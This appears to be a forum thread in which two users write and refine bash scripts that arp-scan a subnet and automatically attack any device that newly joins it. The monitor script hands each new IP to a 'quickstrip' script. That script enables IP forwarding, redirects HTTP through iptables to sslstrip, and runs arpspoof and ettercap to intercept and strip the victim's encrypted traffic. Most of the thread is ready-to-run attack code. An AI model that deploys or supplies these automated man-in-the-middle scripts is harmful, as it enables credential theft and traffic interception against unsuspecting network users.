arpscan network and action on new device

[phillips321]

Hi guys,

Anyone know of a premade script (pref bash) that would scan the current subnet of an interface and if a new device appears perform an action.

Basically i want to monitor my home network for new devices, if someone connects to my network i'm legally allowed to divert all of thier http requests.

Cheers

[mrshrek]

Hi guys,

Anyone know of a premade script (pref bash) that would scan the current subnet of an interface and if a new device appears perform an action.

Basically i want to monitor my home network for new devices, if someone connects to my network i'm legally allowed to divert all of thier http requests.

Cheers

From reading your post it sounds as if you have left a wireless network open in hopes someone will connect to it so you can sniff the traffic and if thats the case I would recommend securing your network against unauthorized access before worrying about launching automated attacks,


anyways i whipped this up quickly.

Code:

#!/bin/bash
#--------------------------------------Fill in your info--------------------------------------------------
varrouter=192.168.1.1
varinterface=eth1
#---------------------------------------------------------------------------------------------------------

#-------------------Do not look at the following mess it will blind you ----------------------------------
arp-scan -l | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > scan.txt
varbadip=`diff -a scan.txt wl.txt | grep \< | sed -e 's/< //'`

if [[ $badip != // ]]; then
echo "New IP Address detected: " $varbadip
echo "Router Address         : " $varrouter
echo "Selected Interface     : " $varinterface
arpspoof -i $varinterface -t $varbadip $varrouter
fi
#--------------------------------------------------------------------------------------------------------

ok so basically you need to create a white list named wl.txt and each ip address needs to be on its own line

Code:

192.168.1.1
192.168.1.13
192.168.1.56
192.168.1.34

then you need to install arp-scan

Code:

apt-get install arp-scan

then run the script, if it sees an address outside of the white list it will start arp spoofing it.

this is pretty much hacked together, i only wrote it for one new address on the network, 2 or more new addresses will most likely break it but if i get some time this week i might work on it to improve my horrible bash skills.

[phillips321]

Cheers for this.

I took it upon me to start with your code then throw something together myself.

I don't use bash often so this is a HUGE mess of code! Basically the script asks for interface and arpscan interval.

You can then call on a custom command each time a new device is found.

Code:

#!/bin/bash
# monitor.sh v1.0
#
# This tool requires arp-scan to be installed and to be run as root
#
# ChangeLog....
# Version 1.0 - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
	echo "MESSAGE:"
	echo "MESSAGE: ERROR: Please run as root!"
	echo "MESSAGE:"
	exit 1
fi

#################################################################
# CHECKING TO SEE IF INTERFACE PROVIDED
#################################################################
if [ -z ${1} ]
then
	echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
	echo "MESSAGE: `basename ${0}` eth0 60"
	echo "ERROR: Please provide an interface to scan on"
	exit 1
else
	INTERFACE="`echo "${1}" | cut -c 1-6`"
	echo "MESSAGE: Monitoring ${1} for new devices"
fi

#################################################################
# CHECKING TO SEE IF PROBE INTERVAL GIVEN
#################################################################
if [ -z ${2} ]
then
	echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
	echo "MESSAGE: `basename ${0}` eth0 60"
	echo "ERROR: Please provide a scan interval in seconds"
	exit 1
else
	INTERVAL="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-4`"
	echo "MESSAGE: Scanning once every ${INTERVAL} seconds"
fi

#################################################################
# IDENTIFY IP, GATEWAY and SUBNET
#################################################################
IPADDR=`ifconfig ${INTERFACE} | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
SUBNET=`ifconfig ${INTERFACE} | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
GATEWAY=`route -n | grep ${INTERFACE} | cut -d' ' -f 1 | grep -v 0.0.0.0 | grep -v 169.254`
echo "MESSAGE: interface=${INTERFACE} gateway=${GATEWAY} ip.addr=${IPADDR} subnet=${SUBNET}"

#################################################################
# DELETE FILES FROM PREVIOUS SCANS
#################################################################
rm -rf SCAN.txt WHITELIST.txt

#################################################################
# PERFORMING FIRST SCAN TO CREATE WHITELIST
#################################################################
arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > WHITELIST.txt

if [[ -s WHITELIST.txt ]] ; then
	echo "MESSAGE: The following devices were found and will be excluded from this monitor."
	cat WHITELIST.txt
else
	echo "MESSAGE: No IPs found during arp-scan, are you sure your interface is up?."
	exit 1
fi ;

#################################################################
# THIS IS THE MONITORING BIT
#################################################################
while true; do
	arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > SCAN.txt
	sort SCAN.txt > tmp.txt
	cat tmp.txt > SCAN.txt
	rm tmp.txt
	NEWIP=`diff -a SCAN.txt WHITELIST.txt | grep \< | sed -e 's/< //'`
	if [ ! -z ${NEWIP}  ]; then
		echo "MESSAGE: New IP detected!!! ${NEWIP}"
		echo ${NEWIP} >> WHITELIST.txt
		#################################################################
		# To run a command when new device found please enter it here
		xterm -e "nmap ${NEWIP}"
		#################################################################		
	fi
	sort WHITELIST.txt > tmp.txt
	cat tmp.txt > WHITELIST.txt
	rm tmp.txt
	sleep ${INTERVAL}
done

exit 0

To exit the while loop you need to Ctrl-c. Any idea on a batter way to allow the user to exit the while loop? Then i'll be able to delete the files created during the script (SCAN.txt and WHITELIST.txt).

Also any idea on how i can improve this bit:

Code:

sort WHITELIST.txt > tmp.txt
cat tmp.txt > WHITELIST.txt
rm tmp.txt

and

Code:

sort SCAN.txt > tmp.txt
cat tmp.txt > SCAN.txt
rm tmp.txt

Cheers

[mrshrek]

edited to fix my long winded post and fix a few errors.

monitor.sh v1.0.1

Code:

#!/bin/bash
# monitor.sh v1.0.1  
# creator: phillips321
# This tool requires arp-scan to be installed and to be run as root
#
# ChangeLog....
# Version 1.0.1 - Minor fixes
# Version 1.0   - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
        echo "MESSAGE:"
        echo "MESSAGE: ERROR: Please run as root!"
        echo "MESSAGE:"
        exit 1
fi

#################################################################
# CHECKING TO SEE IF INTERFACE PROVIDED
#################################################################
if [ -z ${1} ]
then
        echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
        echo "MESSAGE: `basename ${0}` eth0 60"
        echo "ERROR: Please provide an interface to scan on"
        exit 1
else
        INTERFACE="`echo "${1}" | cut -c 1-6`"
        echo "MESSAGE: Monitoring ${1} for new devices"
fi

#################################################################
# CHECKING TO SEE IF PROBE INTERVAL GIVEN
#################################################################
if [ -z ${2} ]
then
        echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
        echo "MESSAGE: `basename ${0}` eth0 60"
        echo "ERROR: Please provide a scan interval in seconds"
        exit 1
else
        INTERVAL="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-4`"
        echo "MESSAGE: Scanning once every ${INTERVAL} seconds"
fi

#################################################################
# IDENTIFY IP, GATEWAY and SUBNET
#################################################################
IPADDR=`ifconfig ${INTERFACE} | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
SUBNET=`ifconfig ${INTERFACE} | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
GATEWAY=`route -n | grep ${INTERFACE} | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
echo "MESSAGE: interface=${INTERFACE} gateway=${GATEWAY} ip.addr=${IPADDR} subnet=${SUBNET}"

#################################################################
# DELETE FILES FROM PREVIOUS SCANS
#################################################################
rm -rf SCAN.txt WHITELIST.txt

#################################################################
# PERFORMING FIRST SCAN TO CREATE WHITELIST
#################################################################
arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > WHITELIST.txt

if [[ -s WHITELIST.txt ]] ; then
        echo "MESSAGE: The following devices were found and will be excluded from this monitor."
        cat WHITELIST.txt
else
        echo "MESSAGE: No IPs found during arp-scan, are you sure your interface is up?."
        exit 1
fi ;

#################################################################
# THIS IS THE MONITORING BIT
#################################################################
while true; do
        arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > SCAN.txt
        sort -n -t '.' +3 -0 -o SCAN.txt SCAN.txt
        NEWIP=`diff -a SCAN.txt WHITELIST.txt | grep \< | sed -e 's/< //'`
        if [ ! -z ${NEWIP}  ]; then
                echo "MESSAGE: New IP detected!!! ${NEWIP}"
                echo ${NEWIP} >> WHITELIST.txt
                #################################################################
                # To run a command when new device found please enter it here
                konsole -e ./quickstrip.sh ${INTERFACE} ${NEWIP} &
                # xterm -e "nmap ${NEWIP}"
                #################################################################
        fi
        sort -n -t '.' +3 -0 -o WHITELIST.txt WHITELIST.txt
        read -t ${INTERVAL} && break
done

rm -rf WHITELIST.txt SCAN.txt

exit 0

quickstrip v1.0.1

Code:

#!/bin/bash
# quickstrip.sh v1.0.1
# creator: mrshrek
# This tool requires arpspoof ettercap and sslstrip to be installed
# It also must be run as root.
#
# Designed to be used with Phillips321's monitor.sh or on its own
#
# ChangeLog...
# Version 1.0.1 - Minor fixes, checked for instances of sslstrip
#               - and ettercap so it wouldnt fail when called
#               - multiple times by monitor.sh
#               - also added cleanup script for multiple instances.
#
# Version 1.0   - First Release
#################################################################
# CHECKING FOR ROOT
#################################################################
if [ `echo -n $USER` != "root" ]
then
        echo "ERROR: Please run as root!"
        exit 1
fi
#################################################################
# CHECK TO SEE IF THERE IS AN OLD CLEANUP SCRIPT
#################################################################
if [ -a sslcleanup.sh ]
  then
    rm -rf sslcleanup.sh
fi
#################################################################
# CHECK FOR ARGS
#################################################################
if [ -z $1 ] || [ -z $2 ]
  then
    echo "Usage: ./quickstrip.sh INTERFACE IPADDRESS"
    exit 1
  else
#################################################################
# SETUP IP FORWARDING AND IPTABLES
#################################################################
    IP_FORWARD=`cat /proc/sys/net/ipv4/ip_forward`
    if [ $IP_FORWARD != 1 ]
      then
        echo 1 > /proc/sys/net/ipv4/ip_forward
    fi
    iptables -t nat -A PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000
#################################################################
# SETUP ARPSPOOF, ETTERCAP AND SSLSTRIP.  CHECK OTHER INSTANCES
#################################################################
    GATEWAY=`route -n | grep $1 | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
    ETTERPID=`ps aux | grep "ettercap -T -q -i" | grep -v grep | sed -e "s/[ /t][ /t]*/#/g" | cut -d '#' -f 2`
    SSLPID=`ps aux | grep "sslstrip" | grep "python" | sed -e "s/[ /t][ /t]*/#/g" | cut -d '#' -f 2`

    konsole -e arpspoof -i $1 -t $2 $GATEWAY &
    if [ -z $SSLPID ]
      then
        konsole -e sslstrip -a -k -f &
    fi
    if [ -z $ETTERPID ]
      then
        ettercap -T -q -i $1
    fi
fi
##################################################################
# CLEAN UP THE MESS IF WE ARE ALL DONE.
##################################################################
if [ -z $ETTERPID ] || [ -z $SSLPID ]
  then
    iptables -t nat -D PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000
    echo 0 > /proc/sys/net/ipv4/ip_forward
    rm sslstrip.log
  else
    echo "SSLSTRIP or ETTERCAP still running."
    echo "To clean up please run: sslcleanup.sh"
    if [ -a sslcleanup.sh ]
      then
        exit 0
    else
      echo "iptables -t nat -D PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000" > sslcleanup.sh
      echo "echo 0 > /proc/sys/net/ipv4/ip_forward" >> sslcleanup.sh
      echo "rm sslstrip.log" >> sslcleanup.sh
      chmod +x sslcleanup.sh
    fi
fi